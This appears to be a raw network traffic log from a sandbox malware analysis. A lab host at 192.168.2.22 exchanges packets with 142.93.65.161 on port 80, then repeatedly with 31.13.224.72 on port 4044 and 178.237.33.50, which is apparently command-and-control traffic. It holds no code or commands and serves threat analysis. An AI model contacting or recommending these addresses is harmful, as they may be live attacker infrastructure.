                                                                                                                                                                                  Dec 3, 2024 14:01:41.157095909 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.157603979 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.157615900 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.157665014 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.158432007 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.158462048 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.158620119 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.159336090 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.159732103 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.159806967 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.160078049 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.160692930 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.160748005 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.161042929 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.329176903 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.329263926 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.329493046 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.329652071 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.329660892 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.329732895 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.330476999 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.330653906 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.330704927 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.331187963 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.331360102 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.331417084 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.332117081 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.332338095 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.332396030 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.333076954 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.333195925 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.333300114 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.333889961 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.334063053 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.334176064 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.334793091 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.334799051 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.334840059 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.335539103 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.335587025 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.335633039 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.336417913 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.336425066 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.336472034 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.337270021 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.337397099 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.337445974 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.338114023 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.338124037 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.338157892 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.338990927 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.339236021 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.339278936 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.339724064 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.340193987 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.340250015 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.340652943 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.340934992 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.340991020 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.341175079 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.341285944 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.341327906 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.341746092 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.341871023 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.341919899 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.342376947 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.342382908 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.342427015 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.342907906 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.342914104 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.342956066 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.343547106 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.343669891 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.343719959 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.344172955 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.344350100 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.344389915 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.345036983 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.345396042 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.345494986 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.345947027 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.345959902 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.345994949 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.346678972 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.346781015 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.346846104 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.347457886 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.347464085 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.347510099 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.348246098 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.348328114 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.348367929 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.349095106 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.349101067 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.349148989 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.349875927 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.349915028 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.349955082 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.350719929 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.350728035 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.350769997 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.351712942 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.351725101 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.351767063 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.352395058 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.352401972 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.352444887 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.353424072 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.353430033 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.353471994 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.353988886 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.354207039 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.354252100 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.354887009 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.354963064 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.355015993 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.355647087 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.355722904 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.355762005 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.356535912 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.356542110 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.356584072 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.357379913 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.357386112 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.357433081 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.358144999 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.358289957 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.358333111 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.358990908 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.359112024 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.359167099 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.359807014 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.360230923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.360302925 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.360627890 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.361152887 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.361196041 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.361447096 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.361453056 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.361618996 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.362296104 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.456258059 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.834060907 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:41.954076052 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.954134941 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:41.961396933 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:42.082778931 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:43.255795002 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:43.467133045 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:43.499309063 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:43.503344059 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:43.623243093 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:43.623296976 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:43.743299961 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.101000071 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.107923985 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:44.227938890 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.302031040 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.339062929 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:44.459059954 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.459180117 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:44.462836027 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:44.574717045 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:44.582904100 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:45.008366108 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:01:45.128334045 CET8049180178.237.33.50192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:45.128422022 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:01:45.326936960 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:01:45.449124098 CET8049180178.237.33.50192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:45.754352093 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:45.963112116 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:45.995404005 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:45.999705076 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.119612932 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.122203112 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.242973089 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.425509930 CET8049180178.237.33.50192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.425587893 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:01:46.439728022 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.560235977 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592125893 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592142105 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592156887 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592204094 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592267036 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592278957 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592289925 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592300892 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592310905 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592329979 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592329979 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592528105 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.592572927 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.600656033 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.600672007 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.600727081 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.608820915 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.712449074 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.712605953 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.793271065 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.793308973 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.793395042 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.797427893 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.799007893 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.799058914 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.799107075 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.808650970 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.808768034 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.809402943 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.816117048 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.816203117 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.816294909 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.824218035 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.824340105 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.824351072 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.832403898 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.832468033 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.832571030 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.842259884 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.842272043 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.842361927 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.848009109 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.848057032 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.848118067 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.856367111 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.856637955 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.856743097 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.863837957 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.864015102 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.864067078 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.871459007 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.871582031 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.871620893 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.879194975 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.879200935 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.879331112 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.994416952 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.994782925 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.994849920 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:46.996834040 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.996895075 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:46.997071981 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.001569033 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.003693104 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.003747940 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.003842115 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.008287907 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.008301020 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.008368015 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.013227940 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.013243914 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.013313055 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.016676903 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.017787933 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.017908096 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.017982006 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.022434950 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.022727013 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.022824049 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.027540922 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.027626038 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.027667046 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.031826973 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.031945944 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.032030106 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.036561966 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.036639929 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.036685944 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.041157007 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.041507959 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.041604996 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.044037104 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.046454906 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.046531916 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.046603918 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.050688028 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.050703049 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.050765038 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.055337906 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.055372953 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.056173086 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.062231064 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.062244892 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.064784050 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.065367937 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.065381050 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.065808058 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.069612026 CET40444917931.13.224.72192.168.2.22
